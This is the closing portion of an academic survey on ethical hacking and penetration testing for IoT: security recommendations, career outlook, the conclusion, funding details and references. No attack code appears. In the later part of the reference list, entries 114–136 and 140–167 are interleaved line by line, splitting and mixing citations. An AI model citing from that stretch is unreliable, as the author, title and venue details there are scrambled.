• Real-time isolation: the need to implement real-time proactive and protective security/safety mechanisms that instantly disconnect or forcibly shut down any compromised IoT device(s) once a security threat is detected. This will ensure that the compromised IoT device(s) will not be (remotely) controlled nor exploited by an adversary.
• Safer IoT Designs: all IoT systems, applications, operating systems, and end-devices must undergo a safety check test before and after achieving the required design to reduce the likelihood and the occurrence of any potential risk that may target any of the presented IoT parts.
• Fulfilling Skill-Gaps: the skill gap is caused by the lack of available skilled ethical hackers. Hence, more advertisements and recruitment campaigns, seminars, and conferences are needed to encourage and educate more people to join the ethical hacking domain.
• Specialised Training: especially security training must be assigned for each staff/employee category to overcome and address the different attack types that they might encounter in their fields.
Fig. 9. Suggested User/Personnel Security Awareness Training for IoT User-related fields.
• International Exchange & Competitions: are needed to enhance the experience and skills that can be acquired via gaming challenges, along with the establishment of new fundamentals for (potential) ethical hackers to follow. This also includes workshops, formations, and educative online courses.
• Cyber threat intelligence: CTI is also important and should be considered as a means to mitigate mainly external threats (and internal ones), since it focuses on the ongoing knowledge, experience, and skills gained from previous attack occurrences [354]. This is always done before assessing both cyber and physical threats and identifying/defining their threat actors [355], in order to identify potential attacks, mitigate them and overcome harmful events before their occurrence, and to determine how cyber defenders will react in case of an attack [356].

In fact, the recommended security and safety measures regarding the IoT can be summarised in the following Fig. 10.

Fig. 10. Recommended security and safety measures to secure and protect the IoT domain.

Nonetheless, future perspectives and scope regarding ethical hacking and penetration testing for IoT domains should also be highlighted.

• New Jobs & Opportunities: ethical hacking and penetration testing jobs are the fastest growing jobs in IT (security) units of prominent organisations and industries. Such jobs are available in the private sector, governments, military, and law enforcement, including investigative agencies such as the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI).
• Outside the Box Thinking: ethical hackers need to be creative problem-solvers to be able to detect and fix unknown system vulnerabilities before their exploitation. This type of thinking is being adopted now in an attempt to remain one step ahead of the attacker.
• Enhanced Critical Decision Making: is another aspect that security firms are looking for, especially among the new generation of ethical hackers, as they are expected to remain vigilant, on high alert, and in some cases part of the rapid incident response team.
• New Skills: are always required depending on which organisation the ethical hacker and pen tester are working for. It is important to enhance their collaboration and communication skills, as well as their project planning, task handling, and management.

11. Conclusion

In this paper, the importance of conducting penetration testing for IoT systems, along with the reliance on trusted ethical hackers to perform simulated attacks, is highlighted and discussed thoroughly. This enables the assessment of the security level against common IoT threats and attacks and provides a better understanding of the evaluation, assessment, and mitigation of any given risk against the IoT domain, including options to detect, patch, and update IoT systems. Moreover, we highlight the key differences between hacking and ethical hacking in IoT systems. On the other hand, we describe how hackers operate according to their objectives, goals, motives, gains, and benefits. We present various taxonomies and frameworks as an overview of the hacking domain in general that are in common with the IoT domain. Finally, many recommendations and suggestions are proposed to further train employees, IT staff, and security personnel, in addition to insights about future work to protect IoT systems by using smart automated ethical hacking and penetration testing solutions.

Authorship clarified

Jean-Paul A. Yaacoub: Writing- Original draft preparation, conceptualization, methodology. Hassan N. Noura: Validation, writing- Original draft preparation, conceptualization, methodology. Ola Salman: Validation, writing- Original draft preparation, conceptualization, methodology. Ali Chehab: Validation, writing- Original draft preparation, conceptualization, methodology.

Funding

This research was supported by funds from the EIPHI Graduate School (contract "ANR-17-EURE-0002").

Ethical approval

This article does not contain any studies with human participants or animals performed by any of the authors.

Declaration of competing interest

The authors declare that they have no known competing financial interests or personal relationships that could have appeared to influence the work reported in this paper.

References

[1] Prabhat Thakur, Mathematical Modelling of Spectrum Sharing in Cognitive Radio Communication Systems.
[2] Kaneez Fizza, Abhik Banerjee, Karan Mitra, Prem Prakash Jayaraman, Rajiv Ranjan, Pankesh Patel, Dimitrios Georgakopoulos, QoE in IoT: a vision, survey and future directions, Discover Internet of Things 1 (1) (2021) 1–14.
[3] Rabie Ramadan, Internet of things (IoT) security vulnerabilities: a review, PLOMS AI 2 (1) (2022).
[4] Binbin Zhao, Shouling Ji, Jiacheng Xu, Tian Yuan, Qiuyang Wei, Qinying Wang, Chenyang Lyu, Xuhong Zhang, Changting Lin, Jingzheng Wu, et al., A large-scale empirical analysis of the vulnerabilities introduced by third-party components in IoT firmware, in: Proceedings of the 31st ACM SIGSOFT International Symposium on Software Testing and Analysis, 2022, pp. 442–454.
[5] Jean-Paul A. Yaacoub, Mohamad Noura, Hassan N. Noura, Ola Salman, Yaacoub Elias, Raphaël Couturier, Chehab Ali, Securing internet of medical things systems: limitations, issues and recommendations, Future Generat. Comput. Syst. 105 (2020) 581–606.
[6] Shriya S. Shetty, Rithika R. Shetty, Tanisha G. Shetty, Divya Jennifer D'Souza, Survey of hacking techniques and its prevention, in: 2017 IEEE International Conference on Power, Control, Signals and Instrumentation Engineering (ICPCSI), IEEE, 2017, pp. 1940–1945.
[7] Radana Dvorak, Heather Dillon, Nicole Ralston, Jeffrey Matthew Welch, Exploring ethical hacking from multiple viewpoints, in: 2020 ASEE Virtual Annual Conference Content Access, 2020.
[8] Urshila Ravindran, Raghu Vamsi Potukuchi, Yufei Peng, Hua Li, Xiaoyan Li, Jikang Wang, Xinyu Zhang, Amruta Khare, Ganesh M. Kakandikar, Omkar K. Kulkarni, A review on web application vulnerability assessment and penetration testing, J. homepage 9 (1) (2022) 1–22, journals/rces.
[9] Sib tul Hassan, Analysis of vulnerabilities in system by penetration testing, Pakistan J. Sci. Res. 2 (1) (2022) 22–25.
[10] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, Digital Forensics vs. Anti-digital Forensics: Techniques, Limitations and Recommendations, 2021, arXiv preprint arXiv:2103.17028.
[11] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, Advanced Digital Forensics and Anti-digital Forensics for IoT Systems: Techniques, Limitations and Recommendations, Internet of Things, 2022, 100544.
[12] Michael Kassner, Ethical Hackers' Top Motivation Isn't Money, According to HackerOne - TechRepublic, February 2018. https://www.techrepublic.com/article/ethical-hackers-top-motivation-isnt-money-according-to-hackerone/ (Accessed 11 January 2019).
[13] Jacob G. Oakley, Why human hackers?, in: Professional Red Teaming, Springer, 2019, pp. 15–28.
[14] Aaron Yi Ding, Gianluca Limon De Jesus, Marijn Janssen, Ethical hacking for boosting IoT vulnerability management: a first look into bug bounty programs and responsible disclosure, in: Proceedings of the Eighth International Conference on Telecommunications and Remote Sensing, ACM, 2019, pp. 49–55.
[15] Sara N. Matheu, Jose L. Hernandez-Ramos, Antonio F. Skarmeta, Gianmarco Baldini, A survey of cybersecurity certification for the internet of things, ACM Comput. Surv. 53 (6) (2020) 1–36.
[16] Mohammed Ali Al-Garadi, Amr Mohamed, Abdulla Khalid Al-Ali, Xiaojiang Du, Ihsan Ali, Mohsen Guizani, A survey of machine and deep learning methods for internet of things (IoT) security, IEEE Commun. Surv. Tutor. 22 (3) (2020) 1646–1685.
[17] Vikas Hassija, Vinay Chamola, Vikas Saxena, Divyansh Jain, Pranav Goyal, Biplab Sikdar, A survey on IoT security: application areas, security threats, and solution architectures, IEEE Access 7 (2019) 82721–82743.
[18] Wan Haslina Hassan, et al., Current research on internet of things (IoT) security: a survey, Comput. Network. 148 (2019) 283–294.
[19] Fadele Ayotunde Alaba, Mazliza Othman, Ibrahim Abaker Targio Hashem, Faiz Alotaibi, Internet of things security: a survey, J. Netw. Comput. Appl. 88 (2017) 10–28.
[20] Jean-Paul A. Yaacoub, Ola Salman, Hassan N. Noura, Nesrine Kaaniche, Chehab Ali, Mohamad Malli, Cyber-physical systems security: limitations, issues and future trends, Microprocess. Microsyst. 77 (2020), 103201.
[21] Noura Hassan, Tarif Hatoum, Ola Salman, Jean-Paul Yaacoub, Chehab Ali, LoRaWAN security survey: issues, threats and possible mitigation techniques, Int. Things 12 (2020), 100303.
[22] Jean Paul A. Yaacoub, Javier Hernandez Fernandez, Hassan N. Noura, Chehab Ali, Security of power line communication systems: issues, limitations and existing solutions, Comp. Sci. Rev. 39 (2021), 100331.
[23] Jean-Paul Yaacoub, Ola Salman, Security Analysis of Drones Systems: Attacks, Limitations, and Recommendations, Internet of Things, 2020, 100218.
[24] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, Robotics cyber security: vulnerabilities, attacks, countermeasures, and recommendations, Int. J. Inf. Secur. (2021) 1–44.
[25] Danielle Griffith, Innovation at the edge: IoT 2.0, in: 2022 IEEE Asian Solid-State Circuits Conference (A-SSCC), IEEE, 2022, pp. 2–3.
[26] Ian Zhou, Imran Makhdoom, Negin Shariati, Muhammad Ahmad Raza, Rasool Keshavarz, Justin Lipman, Mehran Abolhasan, Abbas Jamalipour, Internet of things 2.0: concepts, applications, and future directions, IEEE Access 9 (2021) 70961–71012.
[27] Emily Chow, Ethical Hacking & Penetration Testing, vol. 626, University of Waterloo, Waterloo, Canada, No. AC, 2011.
[28] Matt Bishop, About penetration testing, IEEE Secur. Priv. (6) (2007) 84–87.
[29] Patrick Engebretson, The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Elsevier, 2013.
[30] Rafay Baloch, Ethical Hacking and Penetration Testing Guide, Auerbach Publications, 2017.
[31] Bharat S. Rawal, Gunasekaran Manogaran, Alexender Peter, The basics of hacking and penetration testing, in: Cybersecurity and Identity Access Management, Springer, 2023, pp. 21–46.
[32] Shicheng Zhu, Shunkun Yang, Xiaodong Gou, Yang Xu, Tao Zhang, Yueliang Wan, Survey of testing methods and testbed development concerning internet of things, Wireless Pers. Commun. 123 (1) (2022) 165–194.
[33] Stephen Russell, Tarek Abdelzaher, The internet of battlefield things: the next generation of command, control, communications and intelligence (C3I) decision-making, in: MILCOM 2018-2018 IEEE Military Communications Conference (MILCOM), IEEE, 2018, pp. 737–742.
[34] Vishal Gotarane, Sandeep Raskar, IoT practices in military applications, in: 2019 3rd International Conference on Trends in Electronics and Informatics (ICOEI), IEEE, 2019, pp. 891–894.
[35] Chinonso Okereke, Nur Haliza Abdul Wahab, Mohd Murtadha Mohamad, et al., Autonomous Underwater Vehicle in Internet of Underwater Things: A Survey.
[36] Yutian Zhang, Jun Ni, Hanqing Tian, Wei Wu, Jibin Hu, Integrated robust dynamics control of all-wheel-independently-actuated unmanned ground vehicle in diagonal steering, Mech. Syst. Signal Process. 164 (2022), 108263.
[37] Bisma Bashir, Aqeel Khalique, A review on security versus ethics, Int. J. Comput. Appl. 151 (11) (2016) 13–17.
[38] Somosri Hore, Kumarshankar Raychaudhuri, Cyber espionage—an ethical analysis, in: Innovations in Computational Intelligence and Computer Vision, Springer, 2021, pp. 34–40.
[39] AF Almeida Virgilio, Danilo Doneda, Jacqueline de Souza Abreu, Cyberwarfare and digital governance, IEEE Int. Comput. 21 (2) (2017) 68–71.
[40] Raji Youssef Al-Bayati, Cyber terrorism (models of international efforts to reduce it), Tikrit J. Polit. Sci. 2 (28) (2022) 91–121.
[41] Victoria Jangada Correia, An explorative study into the importance of defining and classifying cyber terrorism in the United Kingdom, SN Comput. Sci. 3 (1) (2022) 1–31.
[42] Denham Byron, Ransomware and Malware Sandboxing, 2022.
[43] Cesar Brito, Luis Pinto, Victor Marinho, Sara Paiva, Pedro Pinto, A review on recent advances in implanted medical devices security, in: 2021 16th Iberian Conference on Information Systems and Technologies (CISTI), IEEE, 2021, pp. 1–6.
[44] Ying He, Ruben Suxo Camacho, Soygazi Hasan, Cunjin Luo, Attacking and defence pathways for intelligent medical diagnosis system (IMDS), Int. J. Med. Inf. 148 (2021), 104415.
[45] Dennis Broeders, Els de Busser, Fabio Cristiano, Tatiana Tropina, Revisiting past cyber operations in light of new cyber norms and interpretations of international law: inching towards lines in the sand? J. Cyber Pol. (2022) 1–39.
[46] Oxford Analytica, Unequal Israeli-Iranian Cyberwar Will Escalate, Emerald Expert Briefings, (oxan-es).
[47] Eduardo Izycki, Eduardo Wallier Vianna, Critical infrastructure: a battlefield for cyber warfare?, in: ICCWS 2021 16th International Conference on Cyber Warfare and Security, Academic Conferences Limited, 2021, p. 454.
[48] Mohee Ahmad, Cyber War: the Hidden Side of the Russian-Ukrainian Crisis, 2022.
[49] George M. Moore, How International Law Applies to Attacks on Nuclear and Associated Facilities in Ukraine, 2022.
[50] Don C. Smith, Playing with Fire: Military Attacks against a Civilian Nuclear Power Station, 2022.
[51] Sourav Banerjee, Chinmay Chakraborty, Sumit Chatterjee, A survey on IoT based traffic control and prediction mechanism, in: Internet of Things and Big Data Analytics for Smart Generation, Springer, 2019, pp. 53–75.
[52] Fenghua Zhu, Yisheng Lv, Yuanyuan Chen, Xiao Wang, Gang Xiong, Fei-Yue Wang, Parallel transportation systems: toward IoT-enabled smart urban traffic control and management, IEEE Trans. Intell. Transport. Syst. 21 (10) (2019) 4063–4071.
[53] Sara Oleiro Araújo, Ricardo Silva Peres, Jose Barata, Fernando Lidon, Jose Cochicho Ramalho, Characterising the agriculture 4.0 landscape—emerging trends, challenges and opportunities, Agronomy 11 (4) (2021) 667.
[54] Bam Bahadur Sinha, R. Dhanalakshmi, Recent advancements and challenges of internet of things in smart agriculture: a survey, Future Generat. Comput. Syst. 126 (2022) 169–184.
[55] PRZETACZNIK Jakub, Russia's War on Ukraine: Timeline of Cyber-Attacks, 2022.
[56] Réka Szabó, Cyber Warfare in the Ukrainian Conflict—A Determinant of the Outcome of the War?, 2022.
[57] Sanjeet Kumar, Sahila Chaudhry, Risk of Hacking in E-Banking: A Study of Private Sector Banks.
[58] Pierre Thalamy, Piranda Benoit, Julien Bourgeois, Engineering efficient and massively parallel 3d self-reconfiguration using sandboxing, scaffolding and coating, Robot. Autonom. Syst. 146 (2021), 103875.
[59] Melanie Schranz, Martina Umlauft, Micha Sende, Wilfried Elmenreich, Swarm robotic behaviors and current applications, Front. Robot. AI 7 (2020) 36.
[60] Rune Langleite, Carsten Griwodz, Frank T. Johnsen, Military Applications of Internet of Things: Operational Concerns Explored in Context of a Prototype Wearable, 2021.
[61] Lin Zhu, Suryadipta Majumdar, Chinwe Ekenna, An invisible warfare with the internet of battlefield things: a literature review, Hum. behav. emerg. technol. 3 (2) (2021) 255–260.
[62] Martti Lehto, Cyber-attacks against critical infrastructure, in: Cyber Security, Springer, 2022, pp. 3–42.
[63] Vasile Coman, et al., The use of cyber attacks during traditional armed conflicts. specific and the commitment of state responsibility, J. Law and Publ. Administr. 8 (15) (2022) 35–44.
[64] Emily Caroscio, Jack Paul, John Murray, Suman Bhunia, Analyzing the ransomware attack on DC metropolitan police department by Babuk, in: 2022 IEEE International Systems Conference (SysCon), IEEE, 2022, pp. 1–8.
[65] Andrew Feutrill, Dinesha Ranathunga, Yuval Yarom, Matthew Roughan, The effect of common vulnerability scoring system metrics on vulnerability exploit delay, in: 2018 Sixth International Symposium on Computing and Networking (CANDAR), IEEE, 2018, pp. 1–10.
[66] Mikhail Buinevich, Konstantin Izrailov, Andrei Vladyko, Testing of utilities for finding vulnerabilities in the machine code of telecommunication devices, in: 2017 19th International Conference on Advanced Communication Technology (ICACT), IEEE, 2017, pp. 408–414.
[67] Petar Čisar, Sanja Maravić Čisar, General vulnerability aspects of internet of things, in: 2015 16th IEEE International Symposium on Computational Intelligence and Informatics (CINTI), IEEE, 2015, pp. 117–121.
[68] Butun Ismail, Patrik Österberg, Houbing Song, Security of the internet of things: vulnerabilities, attacks, and countermeasures, IEEE Commun. Surv. Tutor. 22 (1) (2019) 616–644.
[69] Francesca Meneghello, Matteo Calore, Daniel Zucchetto, Michele Polese, Andrea Zanella, IoT: internet of threats? a survey of practical security vulnerabilities in real IoT devices, IEEE Internet Things J. 6 (5) (2019) 8182–8201.
[70] Tim Jordan, Paul Taylor, A sociology of hackers, Socio. Rev. 46 (4) (1998) 757–780.
[71] Jens David Ohlin, Did Russian cyber interference in the 2016 election violate international law, Tex. Law Rev. 95 (2016) 1579.
[72] Steve Mansfield-Devine, Hacktivism: Assessing the Damage, vol. 2011, Network Security, 2011, pp. 5–13, 8.
[73] Tracey Caldwell, Hacktivism Goes Hardcore, vol. 2015, Network Security, 2015, pp. 12–17, 5.
[74] E Denning Dorothy, Activism, hacktivism, and cyberterrorism: the internet as a tool for influencing foreign policy, Netw. netwars: The future of terror, crime, and militancy 239 (2001) 288.
[75] Gabriel Jozsef Berecz, Istvan Gergely Czibula, Hunting traits for cryptojackers, ICETE (2) (2019) 386–393.
[76] John Glynn, Online gaming: a virtual experiment in the dark side of human nature, Skeptic 24 (1) (2019) 14–18.
[77] Bruce Schneier, Invited talk: the coming AI hackers, in: International Symposium on Cyber Security Cryptography and Machine Learning, Springer, 2021, pp. 336–360.
[78] Lech Janczewski, Andrew Colarik, Cyber Warfare and Cyber Terrorism, IGI Global, 2007.
[79] Randy Borum, John Felker, Sean Kern, Kristen Dennesen, Tonya Feyes, Strategic cyber intelligence, Inf. & Comput. Secur. 23 (3) (2015) 317–332.
[80] Sanjay Goel, Cyberwarfare: connecting the dots in cyber intelligence, Commun. ACM 54 (8) (2011) 132–140.
[81] Libicki Martin, The coming of cyber espionage norms, in: 2017 9th International Conference on Cyber Conflict (CyCon), IEEE, 2017, pp. 1–17.
[82] Nadav Morag, Cybercrime, Cyberespionage, and Cybersabotage: Understanding Emerging Threats, Colorado Technical University, October, 2014, media/CTU/Files/ThoughtLeadership/cybercrime-white-paper.ashx.
[83] Mihoko Matsubara, Countering cyber-espionage and sabotage: the next steps for Japanese–UK cyber-security co-operation, Rusi 159 (1) (2014) 86–93.
[84] Ellen Nakashima, Report on 'Operation Shady Rat' identifies Widespread Cyber-Spying, vol. 3, 2011. Washington Post.
[85] Timothy Sablik, et al., Cyberattacks and the digital dilemma, Econ. Focus (3Q) (2017) 8–11.
[86] Sultana Sharmeen Karim, Cyber-crime Scenario in Banking Sector of Bangladesh: an Overview, –44, 2016, pp. 12–19.
[87] Emma Chanlett-Avery, John W. Rollins, Liana W. Rosen, Catherine A. Theohary, North Korean cyber capabilities, Brief. Congr. Res. Ser. (2017).
[88] Kargl Frank, Joern Maier, Michael Weber, Protecting web servers from distributed denial of service attacks, in: Proceedings of the 10th International Conference on World Wide Web, ACM, 2001, pp. 514–524.
[89] Stas Filshtinskiy, Cybercrime, cyberweapons, cyber wars: is there too much of it in the air? Commun. ACM 56 (6) (2013) 28–30.
[90] Steve M. Furnell, Matthew J. Warren, Computer hacking and cyber terrorism: the real threats in the new millennium? Comput. Secur. 18 (1) (1999) 28–34.
[91] Andrew M. Colarik, Cyber Terrorism: Political and Economic Implications, IGI Global, 2006.
[92] James Andrew Lewis, Assessing the Risks of Cyber Terrorism, Cyber War and Other Cyber Threats, Center for Strategic & International Studies, Washington, DC, 2002.
[93] Jian Hua, Sanjay Bapna, The economic impact of cyber terrorism, J. Strat. Inf. Syst. 22 (2) (2013) 175–186.
[94] Mohammed Alhamed, Omar M. Alsuhaibany, Website Defacement Incident Handling System, Method, and Computer Program Storage Device, US Patent 8,549,637, October 1 2013.
[95] Robert W. Taylor, Eric J. Fritsch, John Liederbach, Digital Crime and Digital Terrorism, Prentice Hall Press, 2014.
[96] Maurice Dawson, Marwan Omar, Jonathan Abramson, Understanding the methods behind cyber terrorism, in: Encyclopedia of Information Science and Technology, third ed., IGI Global, 2015, pp. 1539–1549.
[97] J.P.I.A.G. Charvat, Cyber terrorism: a new dimension in battlespace, The virt. battlefield: Perspect. cyber warfare 3 (2009) 77–87.
[98] Paulo Shakarian, Shakarian Jana, Andrew Ruef, Introduction to Cyber-Warfare: A Multidisciplinary Approach, Newnes, 2013.
[99] Andy Scollick, The Irish defence forces in the drone age, in: E.U. The (Ed.), Irish Defence Forces and Contemporary Security, Springer, 2023, pp. 295–314.
[100] Fabio Cristiano, Deterritorializing cyber security and warfare in Palestine: hackers, sovereignty, and the national cyberspace as normative, CyberOrient 13 (1) (2019) 28–42.
[101] Anthony J. Mattazaro, The Future Fight: Cyberwar at the Operational Level of War, Army Command and General Staff College, Fort Leavenworth, KS, 2020. Technical report.
[102] Daniel Cohen, Danielle Levin, Cyber infiltration during operation protective edge, Forbes vol. 12 (August, 12, 2014).
[103] Ilias Kapsis, 7 crypto-assets and criminality, Organised Crime, Financial Crime, and Criminal Justice: Theoretical Concepts and Challenges (2023) 122.
[104] Fabio Cristiano, Palestinian Territory Occupied1, Routledge Companion to Global Cyber-Security Strategy, 2020, p. 35.
[105] Kyung-shick Choi, Claire Seungeun Lee, Robert Cadigan, Spreading propaganda in cyberspace: comparing cyber-resource usage of Al Qaeda and ISIS, Int. J. Cybersecur. Int. Cyber. 1 (1) (2018) 21–39.
[106] Sabrine Saad, Muriel Chamoun, Stephane B. Bazan, Infowar on the web: when the caliphate goes online, in: Proceedings of the ACM Web Science Conference, 2015, pp. 1–3.
[107] Malcolm Nance, Christopher Sampson, Hacking ISIS: How to Destroy the Cyber Jihad, Simon and Schuster, 2017.
[108] Christina Schori Liang, Unveiling the "united cyber caliphate" and the birth of the e-terrorist, Georgetown J. Int. Aff. (2017) 11–20.
[109] David H. McElreath, Daniel Adrian Doss, Leisa McElreath, Ashley Lindsley, Glenna Lusk, Joseph Skinner, Ashley Wellman, The communicating and marketing of radicalism: a case study of ISIS and cyber recruitment, Int. J. Cyber Warf. Terror. (IJCWT) 8 (3) (2018) 26–45.
[110] Sonali Patil, Ankur Jangra, Mandar Bhale, Akshay Raina, Pratik Kulkarni, Ethical hacking: the need for cyber security, in: 2017 IEEE International Conference on Power, Control, Signals and Instrumentation Engineering (ICPCSI), IEEE, 2017, pp. 1602–1606.
[111] Caroline G. Jones, Computer hackers on the cul-de-sac MySpace suicide indictment under the computer fraud and abuse act sets dangerous precedent, Widener L. Rev. 17 (2011) 261.
[112] John McBrayer, Exploiting the Digital Frontier: Hacker Typology and Motivation, The University of Alabama, 2014.
[113] Sandor Vegh, Classifying forms of online activism: the case of cyberprotests against the World Bank, in: Cyberactivism, Routledge, 2013, pp. 81–106.
[114] Peter Hays Gries, Tears of rage: Chinese nationalist reactions to the belgrade
[140] Prakash Umasankar Mukkara, Ajith Kumar, Subbaraju Uppalapati, Vishnu Vardhan, Sureshkumar Thangavel, Secure Network Communications, US Patent 8,468,347, June 18 2013.
[141] Salvatore J. Stolfo, Malek Ben Salem, Shlomo Hershkop, Methods, Systems, and Media for Masquerade Attack Detection by Monitoring Computer User Behavior, US Patent 8,769,684, July 1 2014.
[142] Crispin Cowan, F. Wagle, Calton Pu, Steve Beattie, Jonathan Walpole, Buffer overflows: attacks and defenses for the vulnerability of the decade, in: Proceedings DARPA Information Survivability Conference and Exposition, DISCEX'00, vol. 2, IEEE, 2000, pp. 119–129.
[143] Krerk Piromsopa, Richard J. Enbody, Survey of protections from buffer-overflow attacks, Eng. J. 15 (2) (2011) 31–52.
[144] Jeremiah Grossman, Whitehat Website Security Statistics Report, 2007. Retrieved March, 8:2010.
[145] Donald Ray, Jay Ligatti, Defining code-injection attacks, ACM Sigplan Not. 47 (2012) 179–190. ACM.
[146] Xing Jin, Xuchao Hu, Kailiang Ying, Wenliang Du, Heng Yin, Gautam Nagesh Peri, Code injection attacks on HTML5-based mobile apps: characterization, detection and mitigation, in: Proceedings of the 2014 ACM SIGSAC Conference on Computer and Communications Security, ACM, 2014, pp. 66–77.
[147] Puspendra Kumar, R.K. Pateriya, A survey on SQL injection attacks, detection and prevention techniques, in: Computing Communication & Networking Technologies (ICCCNT), 2012 Third International Conference on, IEEE, 2012,
embassy bombing, China J. (46) (2001) 25–43. pp. 1–5.
[115] John Sweeney, Jens Holsoe, Ed Vulliamy, Nato bombed Chinese deliberately, [148] Bharti Nagpal, Nanhay Singh, Naresh Chauhan, Angel Panesar, Tool based
Guardian 17 (10) (1999). implementation of sql injection for penetration testing, in: Computing,
[116] Rohan Gunaratna, Inside Al Qaeda: Global Network of Terror, Columbia Communication & Automation (ICCCA), 2015 International Conference on, IEEE,
University Press, 2002. 2015, pp. 746–749.
[117] James P. Farwell, The media strategy of isis, Survival 56 (6) (2014) 49–55. [149] Diallo Abdoulaye Kindy, Al-Sakib Khan Pathan, A survey on sql injection:
[118] Judith Tinnes, Bibliography: islamic state (is, isis, isil, daesh)[part 4], Perspectives vulnerabilities, attacks, and prevention techniques, in: Consumer Electronics
on Terrorism 12 (2) (2018). (ISCE), 2011 IEEE 15th International Symposium on, IEEE, 2011, pp. 468–471.
[119] Shehabat Ahmad, Teodor Mitew, Yahia Alzoubi, Encrypted jihad: investigating the [150] Yunkai Bai, Andrew Stern, Jungmin Park, Mark Tehranipoor, Domenic Forte,
role of telegram app in lone wolf attacks in the west, J. Strat. Secur. 10 (3) (2017) Rascv2: enabling remote access to side-channels for mission critical and iot
3. systems, ACM Trans. Des. Autom. Electron. Syst. 27 (6) (2022) 1–25.
[120] Abdel Bari Atwan, Islamic State: the Digital Caliphate, Univ of California Press, [151] Ahmed Abdullah and Maryam Malik. A Survey on Sql Injection Attacks: Detection
2015. and Prevention.
[121] Darren Linvill, Matthew Chambers, Jennifer Duck, Steven Sheffield, Mapping the [152] Jonathan Held, Cross-site scripting (xss), in: Encyclopedia of Information
Messenger: Exploring the Disinformation of Qanon, First Monday, 2021. Assurance-4 Volume Set (Print), Auerbach Publications, 2010, pp. 638–645.
[122] Martin A. Miller, The dynamics of entangled political violence: from the [153] Ammar Atef Al Azab, Malware Detection and Prevention, Deakin University, 2013.
greensboro massacre (1979) to the war on terror (2001), in: Terrorism and Technical report.
Transatlantic Relations, Springer, 2022, pp. 33–42. [154] Christian Seifert, Jack Stokes, Long Lu, David Heckerman, Christina Colcernian,
[123] Nigel Copsey, Samuel Merrill, Violence and restraint within antifa, Perspect. Sasi Parthasarathy, Navaneethan Santhanam, Scareware Detection, US Patent
terror. 14 (6) (2020) 122–138. 9,130,988, September 8 2015.
[124] Jessie Daniels, Cyber Racism: White Supremacy Online and the New Attack on [155] Amir Afianian, Salman Niksefat, Babak Sadeghiyan, David Baptiste, Malware
Civil Rights, Rowman & Littlefield Publishers, 2009. dynamic analysis evasion techniques: a survey, ACM Comput. Surv. 52 (6) (2019)
[125] Andrew Jakubowicz, et al., Alt_right white lite: trolling, hate speech and cyber 1–28.
racism on social media, Cosmopolitan Civ. Soc.: An Interdiscip. J. 9 (3) (2017) 41. [156] Ori Or-Meir, Nir Nissim, Yuval Elovici, Lior Rokach, Dynamic malware analysis in
[126] Jessie Daniels, Cloaked websites: propaganda, cyber-racism and epistemology in the modern era—a state of the art survey, ACM Comput. Surv. 52 (5) (2019) 1–48.
the digital era, New Media Soc. 11 (5) (2009) 659–683. [157] Qing Hu, Qing Hu, Tamara Dinev, Is spyware an internet nuisance or public
[127] Brian Cashell, William D. Jackson, Mark Jickling, Baird Webel, The Economic menace? Commun. ACM 48 (8) (2005) 61–66.
Impact of Cyber-Attacks, Congressional Research Service Documents, CRS [158] Swarup Bhunia, M. Tehranipoor, The Hardware Trojan War, Springer, Cham,
RL32331, Washington DC), 2004. Switzerland, 2018.
[128] Hilary Tuttle, Cybercrime costs businesses $11.7 million per year, Risk Manag. 64 [159] Mohammad Tehranipoor, Farinaz Koushanfar, A survey of hardware trojan
(10) (2017), 36–36. taxonomy and detection, IEEE design & test of comput. 27 (1) (2010) 10–25.
[129] The global state of information security survey 2018: pwc. https://www.pw [160] Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert,
c.com/us/en/services/consulting/cybersecurity/library/information-security-sur Szydlowski Martin, Richard Kemmerer, Christopher Kruegel, Giovanni Vigna,
vey.html, October 2017. Your botnet is my botnet: analysis of a botnet takeover, in: Proceedings of the 16th
[130] Devin Marsh, Are Ethical Hackers The Best Solution For Combating The Growing ACM Conference on Computer and Communications Security, ACM, 2009,
World Of Cyber-Crime?, PhD thesis University Honors College, Middle Tennessee pp. 635–647.
State University, 2017. [161] Heloise Pieterse, Martin Olivier, Design of a hybrid command and control mobile
[131] Suphannee Sivakorn, Iasonas Polakis, Angelos D. Keromytis, The cracked cookie botnet, J. Inf. Warf. 12 (1) (2013) 70–82.
jar: http cookie hijacking and the exposure of private information, in: 2016 IEEE [162] Arash Habibi Lashkari, Seyedeh Ghazal Ghalebandi, Shahab Alizadeh,
Symposium on Security and Privacy (SP), IEEE, 2016, pp. 724–742. Rohini Devi, Irc botnet major issues and solutions, in: 2011 2nd International
[132] S. Arvind, V Anantha Narayanan, An overview of security in coap: attack and Conference on Networking and Information Technology, vol. 17, IPCSIT, 2011.
analysis, in: 2019 5th International Conference on Advanced Computing & [163] Kassidy Clark, Martijn Warnier, Frances MT. Brazier, Botclouds-the future of
Communication Systems (ICACCS), IEEE, 2019, pp. 655–660. cloud-based botnets, in: CLOSER. Citeseer, 2011.
[133] Zach Shelby, Klaus Hartke, Carsten Bormann, The Constrained Application [164] Ping Wang, Baber Aslam, Cliff C. Zou, Peer-to-peer botnets, in: Handbook of
Protocol (Coap), Technical report, 2014. Information and Communication Security, Springer, 2010, pp. 335–350.
[134] Wolfgang Müller, Evaluating the Security and Resilience of Typical off the Shelf [165] Karim Ahmad, Syed Adeel Ali Shah, Rosli Bin Salleh, Muhammad Arif, Rafidah
Coap Iot Devices: Assessing Coap and Wi-Fi Vulnerabilities, 2022. Md Noor, Mobile botnet attacks–an emerging threat: classification, review and
[135] Muath A. Obaidat, Jian Lim Choong, Kutub Thakur, A secure authentication and open issues, KSII Trans. Internet and Inf. Syst. (TIIS) 9 (4) (2015) 1471–1492.
access control scheme for coap-based iot, in: 2022 5th Conference on Cloud and [166] E Denning Dorothy, Cyberterrorism: the logic bomb versus the truck bomb, Global
Internet of Things (CIoT), IEEE, 2022, pp. 145–149. Dialog. 2 (4) (2000) 29.
[136] Eric Rescorla, Hannes Tschofenig, Nagendra Modadugu, The Datagram Transport [167] Stephen Northcutt, Logic Bombs, Trojan Horses, and Trap Doors, SANS, 2005,
Layer Security (Dtls) Protocol Version 1.3, Internet Engineering Task Force, 2019. pp. 2005–2016.
